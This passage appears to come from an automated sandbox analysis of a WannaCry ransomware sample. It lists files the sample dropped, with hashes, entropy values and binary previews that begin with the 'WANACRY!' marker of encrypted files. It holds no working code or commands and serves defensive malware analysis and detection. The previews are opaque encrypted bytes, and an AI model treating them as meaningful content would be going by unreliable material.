                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.831496670032283
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk+j5HSPxC9B3b6GqIA0ZgkX0TXxwS5+HvLjTkbS5yTkRErZv13D1WxPqsCCs:bkwexC9B3ZK0ZgkXYXxwXfTkbYKu691x
                                                                                      MD5:F48FF7E8E11C43204F678C81A778EFB3
                                                                                      SHA1:AFE4A7C41DA671BEC4B7E38EADFF907CBF6D64BA
                                                                                      SHA-256:C6F383B66E24D725E4B2187ABBDF6E4DEE073152A1446FEF290FDFC6C49F3A6F
                                                                                      SHA-512:80560DC42809AF56A4F7388E5465BAB606FDAC82E4AEF7399391C73C892B596CC3E544F5A46AD4F1A435A7C5895EA518E1CF4045D6A744853D4A6CE4542C3BB0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......P....n1.....?....|"a.k.A..k-...n#..9./...f.....&...\..g....v.....R.B.fE...SDP(b.}....c.5.9..,O,..)I...K......tW.S..F..hz...Q.S.t.......6...68U.r.E..'P.#..:]X....w..*...M.B.e.vrZ.I.2.....^.MT................j.x[mR.@.......K.'[T.e.^.22..'.}.&.9@................."A=`$t/....H|.t.F.31S.'.KZG^K.~T..m...V.x...Ph....#...]..d..q..1.....a.)..}:#...._.)K...Z...@..U,I..'.....[?"....'!..U..Hu.G#.k..GD.i3.T.B......Y.et.9..p....00'.U...(.......!..2..5.....[8I+...hs`d......m.c..G..(w..sL...rg+....JV....3.Q......F....O........C.3..n}..h...........O.z...O.P...<MCx.l..%..?s0..@.`.Z../..T.Y...p...N....)ke.O....)..W;...LS....Wv..=y..R....z0&..Q>...\~.j.....'cA.....?.}.L.t..]..@.R....V5.Z+{.........~..2..+.k*.x@..[.^.F...{..!d..W%.....!.X...v.u..`;..g[....Oig...{m...P.0.!l.....y.`.......6.L......T.........g./..IOl.3y.s6h.."...1..p...M0(......rXl..."....&eW|.+..Z.8.r..}L.|..t...%.29rS./5.!.{$7.wD..xsm..8.Jh..g...K..5G|r....4.:my.TB.5A..........{w!...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.847328621616939
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkKDj7083ALkAQRnFeFTb9DnjTEgrgKuHhgQSgHBKFrf4klX7GIFzRHn:bkIwLetKb9D3/4gTghKJLGKzBn
                                                                                      MD5:D2EFF935587D93AFFE4B1BC50B0B88E6
                                                                                      SHA1:6461F9636DCF84E98D30C855FBBACB26C825DA8D
                                                                                      SHA-256:741A4909BB83E4AAD7264771E9E73FE524777A7AF44EEDF36B06D350BC5722AF
                                                                                      SHA-512:A2BBCCC6B036AE3022BBBAB908512AC78AB1E0A052517794C8011023F65D35CA064EEFE62A157679CD5FDAE053F501BF92B9FB8C496A40B320BA08D584A6DCDE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......&"(.._..8..:>.......w0... ..*........8.i.$.zv.8.D8..2D`.K.`...W.........GD...8.m.P..dMo}Z,...~S....x...D...3!.H.3.&..>.%..T=\.Y.{.Io,@`..Hz..f-.....I..Q.C...;R.1.!...F....dV.@..P+..`Z.I.of.....M...!.L.a+"..xf.&.r....BM.K...........!..N.U&..............b.t2.0...J!..@..J.pUmL..\..i..3.....7`...].7.U.r..!.S( ....l"T.z5.....x".b>......."..].].8N....lW.!g..C.......B......3)..k.....Qa_...uL....._....:/Uv&r...,.....y..d.z....XL.r@.O....M..._.y.d.........=.R...T........P...PG..A..,u_..C.&....A.X.P...@:;...cf.......6...K<...n>>F.b,.1W..Tw..9#.Q.U.@..?>."..3g..(.q.LN..Yu<)t.m9...f.S.{K.r)....%._......N..i..#....W.'E.}....@..0a#....u.jg-...8.l..tk4?..d.k..e>...|Q.p.Q .d..QE4l.....J.n.M.H.Q..gD...-.._`Lc.....;(.....wU...WA...!.@...c....|..c...Vh.Q......L..WR..L]5i#[.AF$Ph..<Hz.o%g..c..#....z(.8....G....X..SR;.J..)...5.........#[....d8......r.x}.).|U.$c...O.=.!X...>...1.z...4...h..g..^....l....n..y...d1$.Q.0."..D.Eo.iE.....e....7T..>.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.847328621616939
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkKDj7083ALkAQRnFeFTb9DnjTEgrgKuHhgQSgHBKFrf4klX7GIFzRHn:bkIwLetKb9D3/4gTghKJLGKzBn
                                                                                      MD5:D2EFF935587D93AFFE4B1BC50B0B88E6
                                                                                      SHA1:6461F9636DCF84E98D30C855FBBACB26C825DA8D
                                                                                      SHA-256:741A4909BB83E4AAD7264771E9E73FE524777A7AF44EEDF36B06D350BC5722AF
                                                                                      SHA-512:A2BBCCC6B036AE3022BBBAB908512AC78AB1E0A052517794C8011023F65D35CA064EEFE62A157679CD5FDAE053F501BF92B9FB8C496A40B320BA08D584A6DCDE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......&"(.._..8..:>.......w0... ..*........8.i.$.zv.8.D8..2D`.K.`...W.........GD...8.m.P..dMo}Z,...~S....x...D...3!.H.3.&..>.%..T=\.Y.{.Io,@`..Hz..f-.....I..Q.C...;R.1.!...F....dV.@..P+..`Z.I.of.....M...!.L.a+"..xf.&.r....BM.K...........!..N.U&..............b.t2.0...J!..@..J.pUmL..\..i..3.....7`...].7.U.r..!.S( ....l"T.z5.....x".b>......."..].].8N....lW.!g..C.......B......3)..k.....Qa_...uL....._....:/Uv&r...,.....y..d.z....XL.r@.O....M..._.y.d.........=.R...T........P...PG..A..,u_..C.&....A.X.P...@:;...cf.......6...K<...n>>F.b,.1W..Tw..9#.Q.U.@..?>."..3g..(.q.LN..Yu<)t.m9...f.S.{K.r)....%._......N..i..#....W.'E.}....@..0a#....u.jg-...8.l..tk4?..d.k..e>...|Q.p.Q .d..QE4l.....J.n.M.H.Q..gD...-.._`Lc.....;(.....wU...WA...!.@...c....|..c...Vh.Q......L..WR..L]5i#[.AF$Ph..<Hz.o%g..c..#....z(.8....G....X..SR;.J..)...5.........#[....d8......r.x}.).|U.$c...O.=.!X...>...1.z...4...h..g..^....l....n..y...d1$.Q.0."..D.Eo.iE.....e....7T..>.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.858796452936865
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkcGxVIXLciJYamE/zEx4mCSO0T4+SMaA1GSFR3o3QKycfJ5l3OsgTe2:bkcLXLcVErquAhFo3HZ13ONS2
                                                                                      MD5:4E1D17C7D80A453FAF46F63B33E4375F
                                                                                      SHA1:D2F8BF649C1A14E5A652620856FE60DF041B29E1
                                                                                      SHA-256:582EAE887F5B73E8D12AC6A618041156973F281E802F425CCF9BE04FAD28F509
                                                                                      SHA-512:B53324596FB4A26848E4986C81D4C326ACACB4FBCF3BA9590A30339C2AA8EE05CF4908A25A0FA0C61E19DBA49A9E8AD9CA725588DC843AB11082AED2A9B8A1E9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......... s..G(V...).y(.....z..uP`b..An}2<j...G...P..[q.,....h.j.a..F.F_....fD.mP..*.-.rL....t........V0.Ty1u......l.F.2-....[b.i.....^x....<...e.?.H../)20&....ZI.......1.W3u.OE.w....I~.x/.^...eZKfr.].yC.....r.7mG...d.W.Q..<..z@"...e..v.C..+.nh.............S.c....s.t..%.W....0!....$N.Y6^>..av.....m.I.fG_+D.h!....z.....LB.\..... .M\.3.k.]w..i....;....-..P......^.[..P.9#...*]..aIW.....<A..\B.'}J..Oa.~.3Y..[.E.J.!Q`.(i.b..5...........Z.V..7a.......<.m.q....M..&....(*....G.a.`[......C...RA.......We..As.yn....9h........:..c.Y#A..(.k.....t .> 'x.F..-k.C.O?...s..U..[r.wH5.xU....+.....lS.Q_@....!..).q.m.......'?..w~=5k.|..u..`....,s....q8....vO.....W.w|...j... ..Q...`..Y.)i)..O..E,+.mw.*.....C.F..6.#Z7s.....E.A1....l.........\..o?.....sb.xz7H3..YT...k..n...z....|.{.=.3.3.9...........p.4..'|....%0:........5...C.|..zq......&.Q..K..^l.....6.V..{Z....W..e.h.p..M(.+.}....'.!!}V....Nlgv!IpMI....C.t........s.0G.....6......r,.X......F...#.f.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.858796452936865
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkcGxVIXLciJYamE/zEx4mCSO0T4+SMaA1GSFR3o3QKycfJ5l3OsgTe2:bkcLXLcVErquAhFo3HZ13ONS2
                                                                                      MD5:4E1D17C7D80A453FAF46F63B33E4375F
                                                                                      SHA1:D2F8BF649C1A14E5A652620856FE60DF041B29E1
                                                                                      SHA-256:582EAE887F5B73E8D12AC6A618041156973F281E802F425CCF9BE04FAD28F509
                                                                                      SHA-512:B53324596FB4A26848E4986C81D4C326ACACB4FBCF3BA9590A30339C2AA8EE05CF4908A25A0FA0C61E19DBA49A9E8AD9CA725588DC843AB11082AED2A9B8A1E9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......... s..G(V...).y(.....z..uP`b..An}2<j...G...P..[q.,....h.j.a..F.F_....fD.mP..*.-.rL....t........V0.Ty1u......l.F.2-....[b.i.....^x....<...e.?.H../)20&....ZI.......1.W3u.OE.w....I~.x/.^...eZKfr.].yC.....r.7mG...d.W.Q..<..z@"...e..v.C..+.nh.............S.c....s.t..%.W....0!....$N.Y6^>..av.....m.I.fG_+D.h!....z.....LB.\..... .M\.3.k.]w..i....;....-..P......^.[..P.9#...*]..aIW.....<A..\B.'}J..Oa.~.3Y..[.E.J.!Q`.(i.b..5...........Z.V..7a.......<.m.q....M..&....(*....G.a.`[......C...RA.......We..As.yn....9h........:..c.Y#A..(.k.....t .> 'x.F..-k.C.O?...s..U..[r.wH5.xU....+.....lS.Q_@....!..).q.m.......'?..w~=5k.|..u..`....,s....q8....vO.....W.w|...j... ..Q...`..Y.)i)..O..E,+.mw.*.....C.F..6.#Z7s.....E.A1....l.........\..o?.....sb.xz7H3..YT...k..n...z....|.{.=.3.3.9...........p.4..'|....%0:........5...C.|..zq......&.Q..K..^l.....6.V..{Z....W..e.h.p..M(.+.}....'.!!}V....Nlgv!IpMI....C.t........s.0G.....6......r,.X......F...#.f.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.831644633915595
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkctsGmSUW3NJr0vL8Yym6MgFVBPExNIRNfadHEEWEGAWYc0pDei01KypfItY:bkcs9SUWj0g7FVBZNCdSE57M2yNIS
                                                                                      MD5:44C971E56AF0500C1FB129904A3F3DE3
                                                                                      SHA1:1535E8A440D8C3C7DBC7797326ED1F13D1C2C252
                                                                                      SHA-256:ADC663A2A3014D7665D9B522CE8B5D90065C9A3E564379495F92D0F4B4989307
                                                                                      SHA-512:A4F416D45791287219A45CD8B6FB4A1CBDC518B490059585D56DA30852B7CE88E637A943D79B2257A8DCEB53E53D5CD9CDC08A6883B0B7F016B3ED515E790FC6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....F...X...l.\...v.."-k{Hl.&B.T.M2.'U....W7..Jp...5...}.....v.z...Ac..rJ...J........[...K.........z.k...{C......S.R....4(..........p..:.'..:.W..F).L^..3.b..ZzB.p..0#..i...>upP.......@..$, ..B........H.....6.......:.......E..._...@M,..p.................+U.<...0?..`....QK..PQR.Do#.[N.^hQ.A...qS$.E.~v....f.Xz!.kH....^9.k.^&u..u.....3.,..pl..I..z..{._....u.r.6.,.j'...0..q.....AUBL..V..&.9(....j..,R..P.........I.@G7.q.9..iN..r...[974.s....\..i..%...I...a.j....z+.#0R..= ,.....d.R.+.z.A4{...Gn...'....!N[.Q..-.aQ...fF;...^..Y.7.*....z..h....(.....Md9....L....-..^....h...8N.6X,.\...9.2.!..@."..M#K{..r.^EY..Z....Rg.:C+;...}...l.B.."c-.....f.(..kE.OU7.z.......<s.......4.#...~...v.I^h..P.L..|(.^..Zp.4.w#.....b...6.q...Q...&d.Vp.......I.........M......#.~..zGh...%......(.......{4z./].M..I.E..]T.#....H..J.`.b.p..\.}....I.F.n.'...'[......<.....U..~.q.R9.[..5..V..H.A..&\.5.z>.N".8t.<'.2*.F.M#t......... ..zq..r&....EP.`.V.<P$g.MrG.5...@%T.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.831644633915595
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkctsGmSUW3NJr0vL8Yym6MgFVBPExNIRNfadHEEWEGAWYc0pDei01KypfItY:bkcs9SUWj0g7FVBZNCdSE57M2yNIS
                                                                                      MD5:44C971E56AF0500C1FB129904A3F3DE3
                                                                                      SHA1:1535E8A440D8C3C7DBC7797326ED1F13D1C2C252
                                                                                      SHA-256:ADC663A2A3014D7665D9B522CE8B5D90065C9A3E564379495F92D0F4B4989307
                                                                                      SHA-512:A4F416D45791287219A45CD8B6FB4A1CBDC518B490059585D56DA30852B7CE88E637A943D79B2257A8DCEB53E53D5CD9CDC08A6883B0B7F016B3ED515E790FC6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....F...X...l.\...v.."-k{Hl.&B.T.M2.'U....W7..Jp...5...}.....v.z...Ac..rJ...J........[...K.........z.k...{C......S.R....4(..........p..:.'..:.W..F).L^..3.b..ZzB.p..0#..i...>upP.......@..$, ..B........H.....6.......:.......E..._...@M,..p.................+U.<...0?..`....QK..PQR.Do#.[N.^hQ.A...qS$.E.~v....f.Xz!.kH....^9.k.^&u..u.....3.,..pl..I..z..{._....u.r.6.,.j'...0..q.....AUBL..V..&.9(....j..,R..P.........I.@G7.q.9..iN..r...[974.s....\..i..%...I...a.j....z+.#0R..= ,.....d.R.+.z.A4{...Gn...'....!N[.Q..-.aQ...fF;...^..Y.7.*....z..h....(.....Md9....L....-..^....h...8N.6X,.\...9.2.!..@."..M#K{..r.^EY..Z....Rg.:C+;...}...l.B.."c-.....f.(..kE.OU7.z.......<s.......4.#...~...v.I^h..P.L..|(.^..Zp.4.w#.....b...6.q...Q...&d.Vp.......I.........M......#.~..zGh...%......(.......{4z./].M..I.E..]T.#....H..J.`.b.p..\.}....I.F.n.'...'[......<.....U..~.q.R9.[..5..V..H.A..&\.5.z>.N".8t.<'.2*.F.M#t......... ..zq..r&....EP.`.V.<P$g.MrG.5...@%T.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84923610496748
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkOAbYq17dbahVaWVYpzf3jHn+Wdx0mJSvl2zrMXw/VmqlUjbVVnvEl6H3dihsn:bkrbrdbamWypzf3T+WXJScvMA923VNv5
                                                                                      MD5:787208FD30B0885069D8BD551C81567F
                                                                                      SHA1:FB37CF0A7CA0E1FE95754794D04D7D031C0427F7
                                                                                      SHA-256:766C14DEA4F84940D1F1D9D7759145EA7EBE0E690D507B1BF6B03160561CFFF8
                                                                                      SHA-512:3F64C1FDAA659C6373156AF7EE6884FA5E49BCFDFAB169966EF70874DE1FCDCAD0BDCA96DB3DF62F6AA97AD844CF3700B644ABCBD67DCD1C1A0C942217792762
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........V.%|.._H.O.....}@[.i.|...wJ..i..@.<.5mZ.0.....L..}Go}.Ci}..../2!....@,...g...n..HE.7!p5.I.;..G..H..........B....{w......w.....7.%.`~er...%.oa...W.E7d>M.x.@..(Tr.~$.N...2G....2 ..d.I..A..gN.`.-.NX...2.w....ZC_.^.D.I.^.w.S4.......C.#........<h..............vI...e..8OLTD..i&..f.%n`.h.v....zB.SK>.#,.B4..A.[b...,Q...t#^f.<Y..0[...g.y..}...#..../(xY[S....|...B.Ndg..T....u.:.....@.;WqO'_!tC).........@...f..........f.?-...fwY....).....}.n.Y.........d<NV...M%.q_.lO..4...-Cu;RY..+..n.._..5.gp.k.....:In.kw.}wmq.& '.0LT..,.x..R,....c?g_..V..[......0.j.$.....K.h........ y...b...B...T.]..J.eB..o.4a..{PD...V.....O.;..+~"........O..!.rg........R.y0g......=D$...?Q...G.K.Z.|...F.x.b.....?AR5.T....(.:..S6..Hu.M...(S.8t...x....z..!u."..W......y...3.........."Zp(.Y...[.BE.W..IR..\q`....x.sV.P.`.H.%p...G.H...?@...<...Z./&"t\.....QMwC..P..../.T,c..[.....U.I.5..y..Q^ZA.P.....r;...._p}y...fx6.`.%}...}...L.k...J....d~.i../..1TDi..PQ.va..'..M.U.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84923610496748
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkOAbYq17dbahVaWVYpzf3jHn+Wdx0mJSvl2zrMXw/VmqlUjbVVnvEl6H3dihsn:bkrbrdbamWypzf3T+WXJScvMA923VNv5
                                                                                      MD5:787208FD30B0885069D8BD551C81567F
                                                                                      SHA1:FB37CF0A7CA0E1FE95754794D04D7D031C0427F7
                                                                                      SHA-256:766C14DEA4F84940D1F1D9D7759145EA7EBE0E690D507B1BF6B03160561CFFF8
                                                                                      SHA-512:3F64C1FDAA659C6373156AF7EE6884FA5E49BCFDFAB169966EF70874DE1FCDCAD0BDCA96DB3DF62F6AA97AD844CF3700B644ABCBD67DCD1C1A0C942217792762
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........V.%|.._H.O.....}@[.i.|...wJ..i..@.<.5mZ.0.....L..}Go}.Ci}..../2!....@,...g...n..HE.7!p5.I.;..G..H..........B....{w......w.....7.%.`~er...%.oa...W.E7d>M.x.@..(Tr.~$.N...2G....2 ..d.I..A..gN.`.-.NX...2.w....ZC_.^.D.I.^.w.S4.......C.#........<h..............vI...e..8OLTD..i&..f.%n`.h.v....zB.SK>.#,.B4..A.[b...,Q...t#^f.<Y..0[...g.y..}...#..../(xY[S....|...B.Ndg..T....u.:.....@.;WqO'_!tC).........@...f..........f.?-...fwY....).....}.n.Y.........d<NV...M%.q_.lO..4...-Cu;RY..+..n.._..5.gp.k.....:In.kw.}wmq.& '.0LT..,.x..R,....c?g_..V..[......0.j.$.....K.h........ y...b...B...T.]..J.eB..o.4a..{PD...V.....O.;..+~"........O..!.rg........R.y0g......=D$...?Q...G.K.Z.|...F.x.b.....?AR5.T....(.:..S6..Hu.M...(S.8t...x....z..!u."..W......y...3.........."Zp(.Y...[.BE.W..IR..\q`....x.sV.P.`.H.%p...G.H...?@...<...Z./&"t\.....QMwC..P..../.T,c..[.....U.I.5..y..Q^ZA.P.....r;...._p}y...fx6.`.%}...}...L.k...J....d~.i../..1TDi..PQ.va..'..M.U.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.851458350677381
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkGBzT3J9vROd6FVH75Scqfy7fakTkB3FYW3GVlfjT0hcIECJq9:bkUXAAFtFScAyZAzbmlfjQhUCJA
                                                                                      MD5:E21C7727BCFEA73EF6C20CD52AAF9052
                                                                                      SHA1:006EC8F32FB586705F1CE27D83B67CA7C7B1F200
                                                                                      SHA-256:84F0C5271DA3B0C7A7EB80F4CAA1C45E1CCB9FE05EBF1A1C6C3634A6915C4A79
                                                                                      SHA-512:C854E8E8E64AB93ACCB590610644D3007C07F28D9033D010E6A53ADB6E8BF964023D10F358B6680C5587788CDF308535E0CF6B14589A4B6F8466497E328662C4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....z.}...o.L...HZ..fC[.0.../}!......h.......lg.....Lf...F....k4...q..N....e*...5)...5a..Z..F....=C.$...[}.......hJ...PT.Z..M.w..4e......S)..Q.......'dI.9K......C....h}..(i..#.;....ya....m...TL2...]l*.._.H..?W.G..|...&.0..1.Jb.%.y...V.....Six\.J9............ ........$ H_;..o...!.|.6..Zv.A9.;...2...+'....!...M.C..z.n..1m*N..p..*1.O.S_...u1S.3v..>2Q..GU.4TW....7U.].....W"._K...U...."...!.R>\.-..O\.:...]}....SM......@Q3..2U.Mr....6.J.MvrBu.G....E.........a...'.O..!.>..n;?>./..R[9v...T..;y).X..:_..%*...2.$Uy.PV....J..)I.tQ..e........D.(...+....vRK.Q......Vz...9x.y3C..D.=g..&:!..o.....@k./.,..OOo..\...Ww...@l}......&1-k."..DP/.......A.r....X..)...y.gM...V.y.........M...Z..B..O@...U..6..:l,E..g...Gq....{P&.PO.....l`d....CJ.7:..<...m....z...J...j..C..X.,...I:..|..r..`;........-. .8.....9VU.....g.I\g...(.K{.5H\..'..4S.w........Dz.\'.....Q.B.!.E....y........j..G....1.....gd.hr.2..E.5....TLQ..d.J.....S.F=.Q.....%:.i.H.../6....l......@b..Z.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.851458350677381
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkGBzT3J9vROd6FVH75Scqfy7fakTkB3FYW3GVlfjT0hcIECJq9:bkUXAAFtFScAyZAzbmlfjQhUCJA
                                                                                      MD5:E21C7727BCFEA73EF6C20CD52AAF9052
                                                                                      SHA1:006EC8F32FB586705F1CE27D83B67CA7C7B1F200
                                                                                      SHA-256:84F0C5271DA3B0C7A7EB80F4CAA1C45E1CCB9FE05EBF1A1C6C3634A6915C4A79
                                                                                      SHA-512:C854E8E8E64AB93ACCB590610644D3007C07F28D9033D010E6A53ADB6E8BF964023D10F358B6680C5587788CDF308535E0CF6B14589A4B6F8466497E328662C4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....z.}...o.L...HZ..fC[.0.../}!......h.......lg.....Lf...F....k4...q..N....e*...5)...5a..Z..F....=C.$...[}.......hJ...PT.Z..M.w..4e......S)..Q.......'dI.9K......C....h}..(i..#.;....ya....m...TL2...]l*.._.H..?W.G..|...&.0..1.Jb.%.y...V.....Six\.J9............ ........$ H_;..o...!.|.6..Zv.A9.;...2...+'....!...M.C..z.n..1m*N..p..*1.O.S_...u1S.3v..>2Q..GU.4TW....7U.].....W"._K...U...."...!.R>\.-..O\.:...]}....SM......@Q3..2U.Mr....6.J.MvrBu.G....E.........a...'.O..!.>..n;?>./..R[9v...T..;y).X..:_..%*...2.$Uy.PV....J..)I.tQ..e........D.(...+....vRK.Q......Vz...9x.y3C..D.=g..&:!..o.....@k./.,..OOo..\...Ww...@l}......&1-k."..DP/.......A.r....X..)...y.gM...V.y.........M...Z..B..O@...U..6..:l,E..g...Gq....{P&.PO.....l`d....CJ.7:..<...m....z...J...j..C..X.,...I:..|..r..`;........-. .8.....9VU.....g.I\g...(.K{.5H\..'..4S.w........Dz.\'.....Q.B.!.E....y........j..G....1.....gd.hr.2..E.5....TLQ..d.J.....S.F=.Q.....%:.i.H.../6....l......@b..Z.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8368174638332615
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkTjBxH7+Egp64OR3WEv5IFoTFgj5vKznoKV22+R1+1R6JjzUrsJxC:bkTlZlb4O1WuIFouj5vKznMX+SRJxC
                                                                                      MD5:9639450A381195AE23DEBC8D6F1A8479
                                                                                      SHA1:17B6AC09EC83A2F6086A0EE475611ECE9D2AAC1B
                                                                                      SHA-256:005977EF3B317018ECDAFD12A4F18FF01658CF736B55DDFE5B0A529A9A18B0A1
                                                                                      SHA-512:1F5C32212ADE9D89ECA9C182EEAECBC442A0585C4382CC3F357212BA65A4233786FB8CEBEBA42876A90EBED17BDC6A4E52844AA4C70B7D3E9988E92C248CA632
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......iG.q..Z..bGpN..x...N*....K#.~.{..Cw.G...c..g..V.W..`S..q.W.E(...9..Y....tJ.L...*....t((....[...".....T...a.2..IP.l3..v..+<iN. G+41.v..}....T..R.LM.*.....Ax..*E.+...;...2L... @X.^..y....+..{...b.N..z.#?-p..w).v....Eh.s..:..5....{.K....[z...................g.w ........$....E.BW..Co.O.L......Cs.n..$oi.=4...!.Gd...@.T2....R......7..r........EB.......#R..H....g.b.{H..%.....".Eo.@...]..rY...d~....+.!..:a-.........x.O..R..I...._.)ox.UB.YC4,.e..~.%tM.2..Qn..."...AQ.).i.@...wv.b.v..?........Z.A..-|..X^`^d..l.x.?E.....Xm..k..~..tm|.~..)....|...G.J...sh..).a.........Rf.7..a..L...D.E.G..D%z.#I...t.H..q.....g."R..D.jS.......~A....e..jr..............n!..zIT......JT..ZD..u.....D0..N..1f.[Vu......=....I.<)N.E\...#....o=j.W_P.V..;5.Kgi...\.....!......}...3C,...p.t.0K...t.Em.$..<3..JY....(.^.j..j........p...G...I..Fi.r..X.L.X...dU.....@.F-...N..u.B..6.A.'.......o.s..S.........V..A........"R...,....d'y.B y...V.k_T.....sh.....l.[...!..o..+...*..R....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8368174638332615
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkTjBxH7+Egp64OR3WEv5IFoTFgj5vKznoKV22+R1+1R6JjzUrsJxC:bkTlZlb4O1WuIFouj5vKznMX+SRJxC
                                                                                      MD5:9639450A381195AE23DEBC8D6F1A8479
                                                                                      SHA1:17B6AC09EC83A2F6086A0EE475611ECE9D2AAC1B
                                                                                      SHA-256:005977EF3B317018ECDAFD12A4F18FF01658CF736B55DDFE5B0A529A9A18B0A1
                                                                                      SHA-512:1F5C32212ADE9D89ECA9C182EEAECBC442A0585C4382CC3F357212BA65A4233786FB8CEBEBA42876A90EBED17BDC6A4E52844AA4C70B7D3E9988E92C248CA632
                                                                                      Malicious:false
                                                                                      Reputation:low
